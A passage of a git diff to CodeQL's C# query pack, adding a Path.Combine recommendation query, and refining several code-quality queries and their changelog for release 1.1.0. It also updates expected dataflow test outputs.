preservesValue = true and + result.asExpr() = prop.getAnAccess() + } + } +} diff --git a/csharp/ql/src/API Abuse/NoDisposeCallOnLocalIDisposable.ql b/csharp/ql/src/API Abuse/NoDisposeCallOnLocalIDisposable.ql index 3072b154812f..e5826c423427 100644 --- a/csharp/ql/src/API Abuse/NoDisposeCallOnLocalIDisposable.ql +++ b/csharp/ql/src/API Abuse/NoDisposeCallOnLocalIDisposable.ql @@ -16,6 +16,7 @@ import csharp import Dispose import semmle.code.csharp.frameworks.System +import semmle.code.csharp.frameworks.system.threading.Tasks import semmle.code.csharp.commons.Disposal private class ReturnNode extends DataFlow::ExprNode { @@ -24,15 +25,27 @@ private class ReturnNode extends DataFlow::ExprNode { } } +private class Task extends Type { + Task() { + this instanceof SystemThreadingTasksTaskClass or + this instanceof SystemThreadingTasksTaskTClass + } +} + module DisposeCallOnLocalIDisposableConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node node) { - node.asExpr() = - any(LocalScopeDisposableCreation disposable | - // Only care about library types - user types often have spurious IDisposable declarations - disposable.getType().fromLibrary() and - // WebControls are usually disposed automatically - not disposable.getType() instanceof WebControl - ) + exists(LocalScopeDisposableCreation disposable, Type t | + node.asExpr() = disposable and + t = disposable.getType() + | + // Only care about library types - user types often have spurious IDisposable declarations + t.fromLibrary() and + // WebControls are usually disposed automatically + not t instanceof WebControl and + // It is typically not nessesary to dispose tasks + // https://devblogs.microsoft.com/pfxteam/do-i-need-to-dispose-of-tasks/ + not t instanceof Task + ) } predicate isSink(DataFlow::Node node) { diff --git a/csharp/ql/src/Bad Practices/Control-Flow/ConstantCondition.ql b/csharp/ql/src/Bad Practices/Control-Flow/ConstantCondition.ql index a0542a947356..88d938e399fe 100644 --- a/csharp/ql/src/Bad Practices/Control-Flow/ConstantCondition.ql +++ b/csharp/ql/src/Bad Practices/Control-Flow/ConstantCondition.ql @@ -119,9 +119,14 @@ class ConstantMatchingCondition extends ConstantCondition { } override predicate isWhiteListed() { - exists(SwitchExpr se, int i | - se.getCase(i).getPattern() = this.(DiscardExpr) and + exists(Switch se, Case c, int i | + c = se.getCase(i) and + c.getPattern() = this.(DiscardExpr) + | i > 0 + or + i = 0 and + exists(Expr cond | c.getCondition() = cond and not isConstantCondition(cond, true)) ) or this = any(PositionalPatternExpr ppe).getPattern(_) diff --git a/csharp/ql/src/Bad Practices/PathCombine.qhelp b/csharp/ql/src/Bad Practices/PathCombine.qhelp new file mode 100644 index 000000000000..2562a615c87d --- /dev/null +++ b/csharp/ql/src/Bad Practices/PathCombine.qhelp @@ -0,0 +1,18 @@ + + + +

Path.Combine may silently drop its earlier arguments if its later arguments are absolute paths. E.g. Path.Combine("C:\\Users\\Me\\Documents", "C:\\Program Files\\") == "C:\\Program Files".

+ + + +

Use Path.Join instead.

+ + + +
  • Microsoft Learn, .NET API browser, Path.Combine.
    • +
  • Microsoft Learn, .NET API browser, Path.Join.
    • + +     +     diff --git a/csharp/ql/src/Bad Practices/PathCombine.ql b/csharp/ql/src/Bad Practices/PathCombine.ql new file mode 100644 index 000000000000..aa841486bdff --- /dev/null +++ b/csharp/ql/src/Bad Practices/PathCombine.ql @@ -0,0 +1,16 @@ +/** + * @name Call to System.IO.Path.Combine + * @description Finds calls to System.IO.Path's Combine method + * @kind problem + * @problem.severity recommendation + * @precision very-high + * @id cs/path-combine + * @tags reliability + */ + +import csharp +import semmle.code.csharp.frameworks.System + +from MethodCall call +where call.getTarget().hasFullyQualifiedName("System.IO", "Path", "Combine") +select call, "Call to 'System.IO.Path.Combine'." diff --git a/csharp/ql/src/CHANGELOG.md b/csharp/ql/src/CHANGELOG.md index 09d65767a943..125e61622531 100644 --- a/csharp/ql/src/CHANGELOG.md +++ b/csharp/ql/src/CHANGELOG.md @@ -1,3 +1,18 @@ +## 1.1.0 + +### New Queries + +* Added a new query, `csharp/path-combine`, to recommend against the `Path.Combine` method due to it silently discarding its earlier parameters if later parameters are rooted. + +### Minor Analysis Improvements + +* Improved dependency resolution in `build-mode: none` extraction to handle failing `dotnet restore` processes that managed to download a subset of the dependencies before the failure. +* Increase query precision for `cs/useless-gethashcode-call` by not flagging calls to `GetHashCode` on `uint`, `long` and `ulong`. +* Increase query precision for `cs/constant-condition` and allow the use of discards in switch/case statements and also take the condition (if any) into account. +* The `cs/local-not-disposed` query no longer flags un-disposed tasks as this is often not needed (explained [here](https://devblogs.microsoft.com/pfxteam/do-i-need-to-dispose-of-tasks/)). +* Increase query precision for `cs/useless-assignment-to-local` and `cs/constant-condition` when *unknown* types are involved (mostly relevant for `build-mode: none` databases). +* Don't consider an if-statement to be *useless* in `cs/useless-if-statement` if there is at least a comment. + ## 1.0.19 No user-facing changes. diff --git a/csharp/ql/src/Useless code/FutileConditional.ql b/csharp/ql/src/Useless code/FutileConditional.ql index 1000113185d4..d77fd55a434a 100644 --- a/csharp/ql/src/Useless code/FutileConditional.ql +++ b/csharp/ql/src/Useless code/FutileConditional.ql @@ -16,7 +16,8 @@ predicate emptyStmt(Stmt s) { or s = any(BlockStmt bs | - bs.getNumberOfStmts() = 0 + bs.getNumberOfStmts() = 0 and + not any(CommentBlock cb).getParent() = bs or bs.getNumberOfStmts() = 1 and emptyStmt(bs.getStmt(0)) diff --git a/csharp/ql/src/Useless code/IntGetHashCode.ql b/csharp/ql/src/Useless code/IntGetHashCode.ql index c7892fffc650..85d0f56aae0e 100644 --- a/csharp/ql/src/Useless code/IntGetHashCode.ql +++ b/csharp/ql/src/Useless code/IntGetHashCode.ql @@ -16,5 +16,12 @@ import semmle.code.csharp.frameworks.System from MethodCall mc, IntegralType t where mc.getTarget() instanceof GetHashCodeMethod and - t = mc.getQualifier().getType() + t = mc.getQualifier().getType() and + ( + t instanceof ByteType or + t instanceof SByteType or + t instanceof ShortType or + t instanceof UShortType or + t instanceof IntType + ) select mc, "Calling GetHashCode() on type " + t.toStringWithTypes() + " is redundant." diff --git a/csharp/ql/src/change-notes/released/1.1.0.md b/csharp/ql/src/change-notes/released/1.1.0.md new file mode 100644 index 000000000000..e3bffce48a5f --- /dev/null +++ b/csharp/ql/src/change-notes/released/1.1.0.md @@ -0,0 +1,14 @@ +## 1.1.0 + +### New Queries + +* Added a new query, `csharp/path-combine`, to recommend against the `Path.Combine` method due to it silently discarding its earlier parameters if later parameters are rooted. + +### Minor Analysis Improvements + +* Improved dependency resolution in `build-mode: none` extraction to handle failing `dotnet restore` processes that managed to download a subset of the dependencies before the failure. +* Increase query precision for `cs/useless-gethashcode-call` by not flagging calls to `GetHashCode` on `uint`, `long` and `ulong`. +* Increase query precision for `cs/constant-condition` and allow the use of discards in switch/case statements and also take the condition (if any) into account. +* The `cs/local-not-disposed` query no longer flags un-disposed tasks as this is often not needed (explained [here](https://devblogs.microsoft.com/pfxteam/do-i-need-to-dispose-of-tasks/)). +* Increase query precision for `cs/useless-assignment-to-local` and `cs/constant-condition` when *unknown* types are involved (mostly relevant for `build-mode: none` databases). +* Don't consider an if-statement to be *useless* in `cs/useless-if-statement` if there is at least a comment. diff --git a/csharp/ql/src/codeql-pack.release.yml b/csharp/ql/src/codeql-pack.release.yml index e15e0d267b0a..2ac15439f561 100644 --- a/csharp/ql/src/codeql-pack.release.yml +++ b/csharp/ql/src/codeql-pack.release.yml @@ -1,2 +1,2 @@ --- -lastReleaseVersion: 1.0.19 +lastReleaseVersion: 1.1.0 diff --git a/csharp/ql/src/codeql-suites/csharp-ccr.qls b/csharp/ql/src/codeql-suites/csharp-ccr.qls deleted file mode 100644 index 87941ca02ed9..000000000000 --- a/csharp/ql/src/codeql-suites/csharp-ccr.qls +++ /dev/null @@ -1,9 +0,0 @@ -- queries: . -- include: - id: - - cs/index-out-of-bounds - - cs/test-for-negative-container-size - - cs/unchecked-cast-in-equals - - cs/reference-equality-on-valuetypes - - cs/self-assignment - - cs/inefficient-containskey diff --git a/csharp/ql/src/codeql-suites/csharp-code-quality.qls b/csharp/ql/src/codeql-suites/csharp-code-quality.qls new file mode 100644 index 000000000000..b7b533773810 --- /dev/null +++ b/csharp/ql/src/codeql-suites/csharp-code-quality.qls @@ -0,0 +1,14 @@ +- queries: . +- include: + id: + - cs/index-out-of-bounds + - cs/test-for-negative-container-size + - cs/unchecked-cast-in-equals + - cs/reference-equality-on-valuetypes + - cs/self-assignment + - cs/inefficient-containskey + - cs/call-to-object-tostring + - cs/local-not-disposed + - cs/constant-condition + - cs/useless-gethashcode-call + - cs/non-short-circuit diff --git a/csharp/ql/src/qlpack.yml b/csharp/ql/src/qlpack.yml index 39c9ff569f6f..d669f267976f 100644 --- a/csharp/ql/src/qlpack.yml +++ b/csharp/ql/src/qlpack.yml @@ -1,5 +1,5 @@ name: codeql/csharp-queries -version: 1.0.19 +version: 1.1.0 groups: - csharp - queries diff --git a/csharp/ql/src/utils/modelgenerator/internal/CaptureModels.qll b/csharp/ql/src/utils/modelgenerator/internal/CaptureModels.qll index 108c3f84d2c2..125204d7c5bd 100644 --- a/csharp/ql/src/utils/modelgenerator/internal/CaptureModels.qll +++ b/csharp/ql/src/utils/modelgenerator/internal/CaptureModels.qll @@ -233,6 +233,10 @@ module ModelGeneratorInput implements ModelGeneratorInputSig::paramReturnNodeAsOutput(c, pos) } + ParameterPosition getReturnKindParamPosition(ReturnKind kind) { + kind.(OutRefReturnKind).getPosition() = result.getPosition() + } + Callable returnNodeEnclosingCallable(DataFlow::Node ret) { result = DataFlowImplCommon::getNodeEnclosingCallable(ret).asCallable(_) } diff --git a/csharp/ql/test/library-tests/csharp7/LocalTaintFlow.expected b/csharp/ql/test/library-tests/csharp7/LocalTaintFlow.expected index 4a16e2491dfe..a6ecbc3356da 100644 --- a/csharp/ql/test/library-tests/csharp7/LocalTaintFlow.expected +++ b/csharp/ql/test/library-tests/csharp7/LocalTaintFlow.expected @@ -252,7 +252,7 @@ | CSharp7.cs:233:28:233:29 | access to local variable i1 | CSharp7.cs:235:38:235:39 | access to local variable i1 | | CSharp7.cs:233:28:233:33 | ... > ... | CSharp7.cs:233:13:233:33 | [false] ... && ... | | CSharp7.cs:233:28:233:33 | ... > ... | CSharp7.cs:233:13:233:33 | [true] ... && ... | -| CSharp7.cs:235:13:235:42 | [input] SSA phi read(o) | CSharp7.cs:248:9:274:9 | SSA phi read(o) | +| CSharp7.cs:235:13:235:42 | [input] SSA phi read(o) | CSharp7.cs:248:17:248:17 | access to local variable o | | CSharp7.cs:235:33:235:36 | "int " | CSharp7.cs:235:31:235:41 | $"..." | | CSharp7.cs:235:38:235:39 | access to local variable i1 | CSharp7.cs:235:31:235:41 | $"..." | | CSharp7.cs:237:18:237:18 | access to local variable o | CSharp7.cs:237:23:237:31 | String s1 | @@ -260,18 +260,17 @@ | CSharp7.cs:237:18:237:18 | access to local variable o | CSharp7.cs:241:18:241:18 | access to local variable o | | CSharp7.cs:237:23:237:31 | SSA def(s1) | CSharp7.cs:239:41:239:42 | access to local variable s1 | | CSharp7.cs:237:23:237:31 | String s1 | CSharp7.cs:237:23:237:31 | SSA def(s1) | -| CSharp7.cs:239:13:239:45 | [input] SSA phi read(o) | CSharp7.cs:248:9:274:9 | SSA phi read(o) | +| CSharp7.cs:239:13:239:45 | [input] SSA phi read(o) | CSharp7.cs:248:17:248:17 | access to local variable o | | CSharp7.cs:239:33:239:39 | "string " | CSharp7.cs:239:31:239:44 | $"..." | | CSharp7.cs:239:41:239:42 | access to local variable s1 | CSharp7.cs:239:31:239:44 | $"..." | | CSharp7.cs:241:18:241:18 | access to local variable o | CSharp7.cs:242:9:243:9 | [input] SSA phi read(o) | | CSharp7.cs:241:18:241:18 | access to local variable o | CSharp7.cs:244:18:244:18 | access to local variable o | -| CSharp7.cs:242:9:243:9 | [input] SSA phi read(o) | CSharp7.cs:248:9:274:9 | SSA phi read(o) | +| CSharp7.cs:242:9:243:9 | [input] SSA phi read(o) | CSharp7.cs:248:17:248:17 | access to local variable o | | CSharp7.cs:244:18:244:18 | access to local variable o | CSharp7.cs:244:18:244:28 | [input] SSA phi read(o) | | CSharp7.cs:244:18:244:18 | access to local variable o | CSharp7.cs:244:23:244:28 | Object v1 | | CSharp7.cs:244:18:244:18 | access to local variable o | CSharp7.cs:245:9:246:9 | [input] SSA phi read(o) | -| CSharp7.cs:244:18:244:28 | [input] SSA phi read(o) | CSharp7.cs:248:9:274:9 | SSA phi read(o) | -| CSharp7.cs:245:9:246:9 | [input] SSA phi read(o) | CSharp7.cs:248:9:274:9 | SSA phi read(o) | -| CSharp7.cs:248:9:274:9 | SSA phi read(o) | CSharp7.cs:248:17:248:17 | access to local variable o | +| CSharp7.cs:244:18:244:28 | [input] SSA phi read(o) | CSharp7.cs:248:17:248:17 | access to local variable o | +| CSharp7.cs:245:9:246:9 | [input] SSA phi read(o) | CSharp7.cs:248:17:248:17 | access to local variable o | | CSharp7.cs:248:17:248:17 | access to local variable o | CSharp7.cs:254:27:254:27 | access to local variable o | | CSharp7.cs:248:17:248:17 | access to local variable o | CSharp7.cs:257:18:257:23 | Int32 i2 | | CSharp7.cs:248:17:248:17 | access to local variable o | CSharp7.cs:260:18:260:23 | Int32 i3 | @@ -312,10 +311,8 @@ | CSharp7.cs:285:39:285:42 | access to local variable list | CSharp7.cs:287:36:287:39 | access to local variable list | | CSharp7.cs:287:36:287:39 | access to local variable list | CSharp7.cs:289:32:289:35 | access to local variable list | | CSharp7.cs:297:18:297:18 | access to local variable x | CSharp7.cs:297:18:297:22 | SSA def(x) | -| CSharp7.cs:297:18:297:22 | SSA def(x) | CSharp7.cs:297:18:297:22 | [input] SSA phi(x) | -| CSharp7.cs:297:18:297:22 | [input] SSA phi(x) | CSharp7.cs:297:25:297:25 | SSA phi(x) | +| CSharp7.cs:297:18:297:22 | SSA def(x) | CSharp7.cs:297:25:297:25 | access to local variable x | | CSharp7.cs:297:22:297:22 | 0 | CSharp7.cs:297:18:297:18 | access to local variable x | -| CSharp7.cs:297:25:297:25 | SSA phi(x) | CSharp7.cs:297:25:297:25 | access to local variable x | | CSharp7.cs:297:25:297:25 | access to local variable x | CSharp7.cs:297:25:297:30 | ... < ... | | CSharp7.cs:297:25:297:25 | access to local variable x | CSharp7.cs:297:35:297:35 | access to local variable x | | CSharp7.cs:297:25:297:30 | ... < ... | CSharp7.cs:297:25:297:44 | [false] ... && ... | @@ -326,6 +323,5 @@ | CSharp7.cs:297:35:297:44 | [true] ... is ... | CSharp7.cs:297:25:297:44 | [true] ... && ... | | CSharp7.cs:297:40:297:44 | Int32 y | CSharp7.cs:297:40:297:44 | SSA def(y) | | CSharp7.cs:297:40:297:44 | SSA def(y) | CSharp7.cs:299:31:299:31 | access to local variable y | -| CSharp7.cs:297:47:297:49 | SSA def(x) | CSharp7.cs:297:47:297:49 | [input] SSA phi(x) | -| CSharp7.cs:297:47:297:49 | [input] SSA phi(x) | CSharp7.cs:297:25:297:25 | SSA phi(x) | +| CSharp7.cs:297:47:297:49 | SSA def(x) | CSharp7.cs:297:25:297:25 | access to local variable x | | CSharp7.cs:297:49:297:49 | access to local variable x | CSharp7.cs:297:47:297:49 | SSA def(x) | diff --git a/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected b/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected index c5f00cd656f0..7333890f68fc 100644 --- a/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected +++ b/csharp/ql/test/library-tests/dataflow/global/DataFlowPath.expected @@ -421,46 +421,40 @@ edges | GlobalDataFlow.cs:469:21:469:21 | s : String | GlobalDataFlow.cs:469:32:469:32 | access to parameter s | provenance | | | GlobalDataFlow.cs:470:15:470:17 | access to parameter arg : String | GlobalDataFlow.cs:469:21:469:21 | s : String | provenance | | | GlobalDataFlow.cs:473:28:473:41 | "taint source" : String | GlobalDataFlow.cs:466:53:466:55 | arg : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:490:25:490:26 | [post] access to local variable x1 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:490:30:490:31 | [post] access to local variable x2 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:497:31:497:32 | [post] access to local variable y1 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:497:36:497:37 | [post] access to local variable y2 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:497:42:497:43 | [post] access to local variable y3 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:508:33:508:33 | [post] access to local variable x : SubSimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:515:20:515:20 | [post] access to parameter x : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:515:25:515:25 | [post] access to local variable y : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:527:20:527:20 | [post] access to local variable x : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:528:20:528:20 | [post] access to local variable y : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:529:18:529:18 | [post] access to local variable z : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:538:20:538:21 | [post] access to parameter sc : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:546:24:546:24 | [post] access to local variable x : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:490:20:490:31 | [post] ... ? ... : ... : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:497:20:497:43 | [post] ... ? ... : ... : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:508:20:508:33 | [post] (...) ... : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:515:20:515:25 | [post] ... ?? ... : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:525:20:530:9 | [post] ... switch { ... } : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:538:20:538:22 | [post] ...! : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | GlobalDataFlow.cs:546:20:546:24 | [post] ... = ... : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:483:9:483:10 | [post] access to parameter sc : SimpleClass [field field] : String | GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:483:20:483:33 | "taint source" : String | GlobalDataFlow.cs:483:9:483:10 | [post] access to parameter sc : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:490:25:490:26 | [post] access to local variable x1 : SimpleClass [field field] : String | GlobalDataFlow.cs:491:15:491:16 | access to local variable x1 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:490:30:490:31 | [post] access to local variable x2 : SimpleClass [field field] : String | GlobalDataFlow.cs:492:15:492:16 | access to local variable x2 : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:490:20:490:31 | [post] ... ? ... : ... : SimpleClass [field field] : String | GlobalDataFlow.cs:491:15:491:16 | access to local variable x1 : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:490:20:490:31 | [post] ... ? ... : ... : SimpleClass [field field] : String | GlobalDataFlow.cs:492:15:492:16 | access to local variable x2 : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:491:15:491:16 | access to local variable x1 : SimpleClass [field field] : String | GlobalDataFlow.cs:491:15:491:22 | access to field field | provenance | | | GlobalDataFlow.cs:492:15:492:16 | access to local variable x2 : SimpleClass [field field] : String | GlobalDataFlow.cs:492:15:492:22 | access to field field | provenance | | -| GlobalDataFlow.cs:497:31:497:32 | [post] access to local variable y1 : SimpleClass [field field] : String | GlobalDataFlow.cs:498:15:498:16 | access to local variable y1 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:497:36:497:37 | [post] access to local variable y2 : SimpleClass [field field] : String | GlobalDataFlow.cs:499:15:499:16 | access to local variable y2 : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:497:42:497:43 | [post] access to local variable y3 : SimpleClass [field field] : String | GlobalDataFlow.cs:500:15:500:16 | access to local variable y3 : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:497:20:497:43 | [post] ... ? ... : ... : SimpleClass [field field] : String | GlobalDataFlow.cs:498:15:498:16 | access to local variable y1 : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:497:20:497:43 | [post] ... ? ... : ... : SimpleClass [field field] : String | GlobalDataFlow.cs:499:15:499:16 | access to local variable y2 : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:497:20:497:43 | [post] ... ? ... : ... : SimpleClass [field field] : String | GlobalDataFlow.cs:500:15:500:16 | access to local variable y3 : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:498:15:498:16 | access to local variable y1 : SimpleClass [field field] : String | GlobalDataFlow.cs:498:15:498:22 | access to field field | provenance | | | GlobalDataFlow.cs:499:15:499:16 | access to local variable y2 : SimpleClass [field field] : String | GlobalDataFlow.cs:499:15:499:22 | access to field field | provenance | | | GlobalDataFlow.cs:500:15:500:16 | access to local variable y3 : SimpleClass [field field] : String | GlobalDataFlow.cs:500:15:500:22 | access to field field | provenance | | -| GlobalDataFlow.cs:508:33:508:33 | [post] access to local variable x : SubSimpleClass [field field] : String | GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SubSimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SubSimpleClass [field field] : String | GlobalDataFlow.cs:509:15:509:21 | access to field field | provenance | | -| GlobalDataFlow.cs:515:20:515:20 | [post] access to parameter x : SimpleClass [field field] : String | GlobalDataFlow.cs:516:15:516:15 | access to parameter x : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:515:25:515:25 | [post] access to local variable y : SimpleClass [field field] : String | GlobalDataFlow.cs:517:15:517:15 | access to local variable y : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:508:20:508:33 | [post] (...) ... : SimpleClass [field field] : String | GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:509:15:509:15 | access to local variable x : SimpleClass [field field] : String | GlobalDataFlow.cs:509:15:509:21 | access to field field | provenance | | +| GlobalDataFlow.cs:515:20:515:25 | [post] ... ?? ... : SimpleClass [field field] : String | GlobalDataFlow.cs:516:15:516:15 | access to parameter x : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:515:20:515:25 | [post] ... ?? ... : SimpleClass [field field] : String | GlobalDataFlow.cs:517:15:517:15 | access to local variable y : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:516:15:516:15 | access to parameter x : SimpleClass [field field] : String | GlobalDataFlow.cs:516:15:516:21 | access to field field | provenance | | | GlobalDataFlow.cs:517:15:517:15 | access to local variable y : SimpleClass [field field] : String | GlobalDataFlow.cs:517:15:517:21 | access to field field | provenance | | -| GlobalDataFlow.cs:527:20:527:20 | [post] access to local variable x : SimpleClass [field field] : String | GlobalDataFlow.cs:531:15:531:15 | access to local variable x : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:528:20:528:20 | [post] access to local variable y : SimpleClass [field field] : String | GlobalDataFlow.cs:532:15:532:15 | access to local variable y : SimpleClass [field field] : String | provenance | | -| GlobalDataFlow.cs:529:18:529:18 | [post] access to local variable z : SimpleClass [field field] : String | GlobalDataFlow.cs:533:15:533:15 | access to local variable z : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:525:20:530:9 | [post] ... switch { ... } : SimpleClass [field field] : String | GlobalDataFlow.cs:531:15:531:15 | access to local variable x : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:525:20:530:9 | [post] ... switch { ... } : SimpleClass [field field] : String | GlobalDataFlow.cs:532:15:532:15 | access to local variable y : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:525:20:530:9 | [post] ... switch { ... } : SimpleClass [field field] : String | GlobalDataFlow.cs:533:15:533:15 | access to local variable z : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:531:15:531:15 | access to local variable x : SimpleClass [field field] : String | GlobalDataFlow.cs:531:15:531:21 | access to field field | provenance | | | GlobalDataFlow.cs:532:15:532:15 | access to local variable y : SimpleClass [field field] : String | GlobalDataFlow.cs:532:15:532:21 | access to field field | provenance | | | GlobalDataFlow.cs:533:15:533:15 | access to local variable z : SimpleClass [field field] : String | GlobalDataFlow.cs:533:15:533:21 | access to field field | provenance | | -| GlobalDataFlow.cs:538:20:538:21 | [post] access to parameter sc : SimpleClass [field field] : String | GlobalDataFlow.cs:539:15:539:16 | access to parameter sc : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:538:20:538:22 | [post] ...! : SimpleClass [field field] : String | GlobalDataFlow.cs:539:15:539:16 | access to parameter sc : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:539:15:539:16 | access to parameter sc : SimpleClass [field field] : String | GlobalDataFlow.cs:539:15:539:22 | access to field field | provenance | | -| GlobalDataFlow.cs:546:24:546:24 | [post] access to local variable x : SimpleClass [field field] : String | GlobalDataFlow.cs:547:15:547:15 | access to local variable x : SimpleClass [field field] : String | provenance | | +| GlobalDataFlow.cs:546:20:546:24 | [post] ... = ... : SimpleClass [field field] : String | GlobalDataFlow.cs:547:15:547:15 | access to local variable x : SimpleClass [field field] : String | provenance | | | GlobalDataFlow.cs:547:15:547:15 | access to local variable x : SimpleClass [field field] : String | GlobalDataFlow.cs:547:15:547:21 | access to field field | provenance | | | GlobalDataFlow.cs:553:71:553:71 | e : null [element] : String | GlobalDataFlow.cs:556:27:556:27 | access to parameter e : null [element] : String | provenance | | | GlobalDataFlow.cs:556:27:556:27 | access to parameter e : null [element] : String | GlobalDataFlow.cs:558:46:558:46 | access to local variable x : String | provenance | | @@ -880,43 +874,37 @@ nodes | GlobalDataFlow.cs:481:41:481:42 | sc [Return] : SimpleClass [field field] : String | semmle.label | sc [Return] : SimpleClass [field field] : String | | GlobalDataFlow.cs:483:9:483:10 | [post] access to parameter sc : SimpleClass [field field] : String | semmle.label | [post] access to parameter sc : SimpleClass [field field] : String | | GlobalDataFlow.cs:483:20:483:33 | "taint source" : String | semmle.label | "taint source" : String | -| GlobalDataFlow.cs:490:25:490:26 | [post] access to local variable x1 : SimpleClass [field field] : String | semmle.label | [post] access to local variable x1 : SimpleClass [field field] : String | -| GlobalDataFlow.cs:490:30:490:31 | [post] access to local variable x2 : SimpleClass [field field] : String | semmle.label | [post] access to local variable x2 : SimpleClass [field field] : String | +| GlobalDataFlow.cs:490:20:490:31 | [post] ... ? ... : ... : SimpleClass [field field] : String | semmle.label | [post] ... ? ... : ... : SimpleClass [field field] : String | | GlobalDataFlow.cs:491:15:491:16 | access to local variable x1 : SimpleClass [field field] : String | semmle.label | access to local variable x1 : SimpleClass [field field] : String | | GlobalDataFlow.cs:491:15:491:22 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:492:15:492:16 | access to local variable x2 : SimpleClass [field field] : String | semmle.label | access to local variable x2 : SimpleClass [field field] : String | | GlobalDataFlow.cs:492:15:492:22 | access to field field | semmle.label | access to field field | -| GlobalDataFlow.cs:497:31:497:32 | [post] access to local variable y1 : SimpleClass [field field] : String | semmle.label | [post] access to local variable y1 : SimpleClass [field field] : String | -| GlobalDataFlow.cs:497:36:497:37 | [post] access to local variable y2 : SimpleClass [field field] : String | semmle.label | [post] access to local variable y2 : SimpleClass [field field] : String | -| GlobalDataFlow.cs:497:42:497:43 | [post] access to local variable y3 : SimpleClass [field field] : String | semmle.label | [post] access to local variable y3 : SimpleClass [field field] : String | +| GlobalDataFlow.cs:497:20:497:43 | [post] ... ? ... : ... : SimpleClass [field field] : String | semmle.label | [post] ... ? ... : ... : SimpleClass [field field] : String | | GlobalDataFlow.cs:498:15:498:16 | access to local variable y1 : SimpleClass [field field] : String | semmle.label | access to local variable y1 : SimpleClass [field field] : String | | GlobalDataFlow.cs:498:15:498:22 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:499:15:499:16 | access to local variable y2 : SimpleClass [field field] : String | semmle.label | access to local variable y2 : SimpleClass [field field] : String | | GlobalDataFlow.cs:499:15:499:22 | access to field field | semmle.label | access to field field | | GlobalDataFlow.cs:500:15:500:16 